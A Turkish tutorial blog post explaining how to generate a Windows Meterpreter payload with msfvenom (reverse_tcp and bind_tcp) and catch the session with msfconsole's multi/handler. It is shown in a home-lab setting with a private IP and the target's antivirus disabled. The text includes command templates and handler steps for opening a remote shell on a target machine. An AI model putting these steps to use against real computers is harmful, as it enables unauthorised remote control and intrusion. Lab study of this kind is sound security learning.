Metasploit ile Malware Saldırıları
Merhaba, bu yazımda size msfvenom ile nasıl payload oluşturulur ve hedef bilgisayarla nasıl bağlantı kurulur bunu anlatacağım.
Burada önemli iki komut var: “msfconsole” komutu ile metasploit framework arayüzü açılır. “msfvenom” komutu ise zararlı yazılım oluşturma için kullanılır. Hemen örneklerle açıklamaya geçelim.
Örnek-1: Reverse Tcp Bağlantısı
Payload oluşturmak için: msfvenom -p <payload adı> LHOST=<kendi ip adresimiz> LPORT=<belirlediğimiz bir port> -f <dosya formatı> > <dosyanın oluşturulacağı yer>
Reverse Tcp bağlantısı olduğu için kullanacağımız Payload: windows/meterpreter/reverse_tcp
Payload’ın incelenmesi:
1.kısım zararlı yazılımın çalışacağı sistem: Windows
2.kısım bağlantı kurduktan sonra çalışacak program: Meterpreter
3.kısım hedef bilgisayarla bağlantının nasıl kurulacağı: Reverse Tcp
Kodun devamındaki bilgiler Payload’a ait bilgilerdir. LHOST (Local Host) kendi ip adresimizdir çünkü Reverse Tcp bağlantısında amaç hedef bilgisayarın kendi bilgisayarımızda açtığımız kapıya doğru gelmesini sağlamaktır. LPORT (Local Port) ise bağlantının sağlandığı, paketlerin dinlendiği port numarasıdır. Genelde 1 ile 1000 arasındaki portlar tercih edilmez. 1000'den sonra istediğimiz herhangi bir port numarasını girebiliriz.
-f yani format belirlediğimiz parametredir, burada exe formatı çünkü windows bilgisayar için oluşturuyoruz.
Kodda gördüğümüz “>” işareti ile Payload’ın oluşturulacağı yolu ve Payload’ımızı adını belirliyoruz. /home/kali/Desktop ile masaüstü yolu seçilir ve Deneme.exe ismiyle dosyamız oluşur.
Payloadı oluşturduk, şimdiki aşamada devreye msfconsole giriyor. Hedef bilgisayarda Payload açıldığında bağlantı alınması ve hedef sistemde yapılacak işlemler için msfconsole kullanılır. Peki hedef bilgisayar ile nasıl bağlantı kurulur?
İlk olarak terminal ekranından gireceğimiz “msfconsole” komutu çalıştırılır.
- Gelen bağlantıları dinleyebilmek için: multi/handler veya /exploit/multi/handler ikisi de aynı işlemi yapar.
- Modülü çağırabilmek için: use
- Dinleme için gerekli ayar yapıldıktan sonra neyi dinleyeceğimizi seçmek için Payload “set” edilir.
Sitemin bizden istediği bilgiler için “options” komutuna bakılır ve istenenler eklenir.
LHOST (Local Host): kendi ip adresimiz, dinleme yapılacak ip (“ifconfig” komutu ile kendi ip adresimizi öğrenebiliriz)
LPORT (Local Port): dinleme yapılacak port
“options” komutu ve lport, lhost set edilme işlemleri gerçekleştirilir.
“run” veya “exploit” komutları ile dinleme başlatılır.
Kali linux’da oluşturulan exploit Windows bilgisayara atılır. Bu örnekteki zararlı yazılım antivirüs programları tarafından tespit edilebileceği için bilgisayardaki antivirüsün kapatılması gerekir.
Windows bilgisayara atılan Deneme.exe isimli virüs çalıştırıldığında Kali Linux ekranında yaptığımız bağlantı ile dinleme başlamış olur. “Meterpreter session 1 opened” ifadesinden de anlaşılmış olur.
Hedef bilgisayarımın ip adresi 192.168.2.223 olduğu için görselde “sending stage” kısmında 192.168.2.223 adresi gözüküyor.
“help” komutu ile bağlantı sağlamış olduğumuz hedef bilgisayarda neler yapabileceğimizi görebiliriz.
Antivirüs programı tekrar aktif edildiğinde bilgisayara gönderdiğimiz Deneme.exe dosyasının program tarafından tespit edildiğini de görebiliriz:
Örnek-2: Bind Tcp Bağlantısı
Reverse Tcp’de hedef bilgisayardan bizim bilgisayarımıza sinyal göndermesini istiyorduk. Bind Tcp’de ise virüsü gönderdiğimizde hedef bilgisayardan bize kapı açılmış oluyor.
Yine aynı şekilde exploit oluşturulur, bu sefer bind_tcp için yapılır ve dosya oluşur.
Dinleme yapmak, bağlantı oluşturmak için msfconsole’da payload set edildikten sonra “options” ile bizden istenenlere bakılır ve bu sefer RHOST (Remote Host) istendiği görülür. Bind tcp bağlantısı olduğu için hedef sistemden kapı açılacaktır ve hedef sistemin ip adresini girmemiz gerekir.
Hedef sistemin ip adresi set edildikten sonra geri kalan işlemler aynıdır. Virüs dosyası hedef sistemde çalıştırıldığında bağlantı gerçekleşmiş olur.
